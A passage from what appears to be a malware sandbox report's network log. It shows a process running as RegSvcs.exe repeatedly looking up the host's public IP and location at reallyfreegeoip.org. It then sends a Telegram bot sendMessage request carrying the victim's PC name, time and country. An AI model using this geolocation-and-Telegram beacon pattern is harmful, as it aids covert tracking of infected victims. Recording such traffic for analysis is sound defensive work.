                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XAMDDFvESrqfZy43Dz%2B5E7PB6qDF3dLpVCA1lSlGIR3sIeyX6XGYZ9YhQECegiNRYbp0BzdLWebiVMfwfJ4dL5I4wz6I5%2BXfq9Nu7L%2BF51woZk3sdcWOVN1rAL2HnIZMHOHYZE5d"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000c3b5901c327-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1645&rtt_var=822&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4238&recv_bytes=699&delivery_rate=420809&cwnd=189&unsent_bytes=0&cid=d3eae5d3bdcb4caf&ts=209&x=0"
                                                                                                              2025-01-10 22:19:17 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.649728104.21.32.14431672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:18 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-10 22:19:18 UTC853INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:18 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862347
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m9daF94mw4W3gaanQ1KDNn%2BuEOEe%2BKFcfnIICTuwjJOhCAyX8xe509jUpYeAwWI9Ir4CRPtt9x3HHDjtsY0yiRZ9cdxZdkkA50MOc1PNsfY4PIEmrJbCklZlxb6KrXUcjSXprLnY"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000c417de272b9-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1783&rtt_var=683&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1585233&cwnd=217&unsent_bytes=0&cid=d47988d2e0d5c795&ts=283&x=0"
                                                                                                              2025-01-10 22:19:18 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.649740104.21.32.14431672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:19 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-10 22:19:20 UTC861INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:20 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862349
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SaGwwfGsS2R7vfBvHKAMU%2B1wpsMKF3URgrpyH9bhIa7ilayHoHAd%2BBsWCgMYPq4IqkuEYdP7BqXklmWGVUpZNBBFg31deoJ%2F1nGc8y9yOHmj9rmumynls%2BoRexJy4SMbOPT3%2B%2BfX"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000c4a0dcbc327-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1596&rtt_var=610&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1775075&cwnd=189&unsent_bytes=0&cid=65a6253b432e4f4d&ts=155&x=0"
                                                                                                              2025-01-10 22:19:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.649752104.21.32.14431672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:21 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:19:21 UTC849INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:21 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862350
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QGiK2AKRYM6Vd1sA9ZTpE7OPVzSqfOC8UH7KbeUTAAjieVHu8TVTtbBqaVbkg8UdKce1kY47SzRjMtGBAyMOtFETyVI7REckgs4dGN98k9YN9naMheiBh6CV0DdwDiciZpAQ9CiW"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000c525c3fc327-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1704&rtt_var=644&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1691772&cwnd=189&unsent_bytes=0&cid=e55e85c0210874c1&ts=158&x=0"
                                                                                                              2025-01-10 22:19:21 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.649760104.21.32.14431672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:22 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:19:22 UTC859INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:22 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862351
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bpy7%2Fwqd%2F7fB1MFRiecZGCCyMXGdE33FqMfcjjofl%2BkXDp7o5F1ATsjVHDuGlm7lciSuzF9Z4dKadQha5Pjfj%2Bjy0RR%2BPdp2KaM7gvA6d2svpDuyA5o2sjmUyyaK2aZgN4F2RXze"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000c5af9828cda-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1805&min_rtt=1804&rtt_var=680&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1606160&cwnd=243&unsent_bytes=0&cid=267b5b857474f77d&ts=172&x=0"
                                                                                                              2025-01-10 22:19:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.649771104.21.32.14431672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:24 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:19:24 UTC861INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:24 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862353
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wHTCzBZnJ4idN4rbwnWnVV4TK320l1MwaiwK5mJerTjD1o%2BV%2Fzhvs5dkByGVzpSSr%2F0tUojkQeUTYoiZLMj4iWvtklU2bTAFHoDKJ3s%2BRBE6ekO10vu7GL8A7QOyHWpR%2FnPt%2FL7I"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000c63b98272b9-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1843&min_rtt=1827&rtt_var=719&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1488277&cwnd=217&unsent_bytes=0&cid=374aa4969fffed06&ts=151&x=0"
                                                                                                              2025-01-10 22:19:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.649783104.21.32.14431672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:25 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:19:25 UTC855INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:25 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862354
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UPQhyjRj9gOxpmqcBYyxpJ93KwqL9erG26oKBQuktSqLOPZz4m6LtfDFNPYLN8p524vFP8VVm5HecgMPzi%2FuPh4i%2FcvqH%2F4vewECNNDP7orGBgxJG0WZQPaEbodlqtRxEvzRBDHY"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000c6c3a7d41a6-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6274&min_rtt=6274&rtt_var=3137&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=148193&cwnd=241&unsent_bytes=0&cid=4745e3204750a86a&ts=175&x=0"
                                                                                                              2025-01-10 22:19:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.649794104.21.32.14431672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:26 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-10 22:19:26 UTC855INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:26 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862355
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y6%2FZPDtUyMXxErIk6Wq4GJ0eWXgya7NZMu9tsCF4Me8DUHYDJZ54aDceyETg2oHFT%2FMSxvMpf6c1ZFSb136yQaGi%2FtIKw1Iz1kJblXDT5mJn41pROciOiHu6WuLtSOl3H9FTd9bX"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000c74ad4941a6-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1605&rtt_var=608&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1789215&cwnd=241&unsent_bytes=0&cid=f4afae1df6d7da3d&ts=180&x=0"
                                                                                                              2025-01-10 22:19:26 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.649807104.21.32.14431672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:28 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-10 22:19:28 UTC853INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:28 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862357
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2B40wsaCa3eaFqbkJYiMVp26MoVP%2BVrMu653rlBbMv8pEZbANcTyrQLouCIdyPYGuz4w3GdczWtvdqDW2OJwFp5EVdbAfvb3woyVM6krdpYCpFjX1VzhECCOc6CHasGc3uYENhOT"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000c7ccdbb1875-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1639&min_rtt=1636&rtt_var=620&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1756919&cwnd=153&unsent_bytes=0&cid=7dc4037edcb69a1b&ts=154&x=0"
                                                                                                              2025-01-10 22:19:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.2.649811149.154.167.2204431672C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:28 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:53:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                              Host: api.telegram.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:19:29 UTC344INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:19:29 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 55
